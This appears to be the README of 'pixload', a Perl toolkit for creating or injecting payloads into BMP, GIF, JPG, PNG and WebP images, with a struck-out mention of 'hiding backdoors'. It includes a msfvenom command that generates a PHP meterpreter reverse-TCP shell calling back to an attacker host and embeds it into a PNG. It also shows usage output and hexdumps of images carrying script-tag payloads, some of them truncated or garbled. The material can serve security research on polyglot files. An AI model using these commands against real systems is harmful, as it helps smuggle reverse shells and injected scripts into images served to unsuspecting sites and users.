Image Payload Creating/Injecting tools
Set of tools for ~~hiding backdoors~~ creating/injecting payload into images.
The following image types are currently supported: BMP, GIF, JPG, PNG, WebP.
Useful references for better understanding of
pixloadand its use-cases:
If you want to encode a payload in such a way that the resulting binary blob is both valid x86 shellcode and a valid image file, I recommend you to look here and here.
If you want to inject a metasploit payload, try something like this:
msfvenom -p php/meterpreter_reverse_tcp \ LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php # Edit payload.php if need. ./pixload/png.pl -payload "$(cat payload.php)" -output payload.png
The following Perl modules are required:
GD
Image::ExifTool
String::CRC32
On
Debian-basedsystems install these packages:
sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl
On
OSXplease refer to this workaround (thnx 2 @iosdec).
docker build -t pixload . docker run -v "$(pwd):/pixload" -it --rm pixload
BMP Payload Creator/Injector.
Create a minimal BMP Polyglot Image with custom/default payload, or inject payload into existing image.
./bmp.pl [-payload 'STRING'] -output payload.bmpIf the output file exists, then the payload will be injected into the existing file. Else the new one will be created.
./bmp.pl -output payload.bmp[>| BMP Payload Creator/Injector |] Generating output file [✔] File saved to: payload.bmp
[>] Injecting payload into payload.bmp [✔] Payload was injected successfully
payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1
00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/............| 00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |............../| 00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;......| 00000070 01 00 01 01 01 11 00 ff c4 00 14 00 01 00 00 00 |................| 00000080 00 00 00 00 00 00 00 00 00 00 00 00 03 ff da 00 |................| 00000090 08 01 01 00 00 00 01 3f ff d9 |.......?..| 0000009a
PNG Payload Creator/Injector.
Create a PNG Image with custom/default payload, or inject payload into existing image.
The payload is injecting into IDAT data chunks.
./png.pl [-payload 'STRING'] -output payload.pngIf the output file exists, then the payload will be injected into the existing file. Else the new one will be created.
./png.pl -output payload.png[>| PNG Payload Creator/Injector |] Generating output file [✔] File saved to: payload.png
[>] Injecting payload into payload.png
[+] Chunk size: 13 [+] Chunk type: IHDR [+] CRC: fc18eda3 [+] Chunk size: 9 [+] Chunk type: pHYs [+] CRC: 952b0e1b [+] Chunk size: 25 [+] Chunk type: IDAT [+] CRC: c8a288fe [+] Chunk size: 0 [+] Chunk type: IEND
[>] Inject payload to the new chunk: 'pUnk' [✔] Payload was injected successfully
payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
00000000 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 |.PNG........IHDR| 00000010 00 00 00 20 00 00 00 20 08 02 00 00 00 fc 18 ed |... ... ........| 00000020 a3 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e |.....pHYs.......| 00000030 c4 01 95 2b 0e 1b 00 00 00 19 49 44 41 54 48 89 |...+......IDATH.| 00000040 ed c1 31 01 00 00 00 c2 a0 f5 4f ed 61 0d a0 00 |..1.......O.a...| 00000050 00 00 6e 0c 20 00 01 c8 a2 88 fe 00 00 00 00 49 |..n. ..........I| 00000060 45 4e 44 ae 42 60 82 00 00 00 00 00 00 00 00 00 |END.B`..........| 00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000000c0 00 1f 70 55 6e 6b 3c 73 63 72 69 70 74 20 73 72 |..pUnk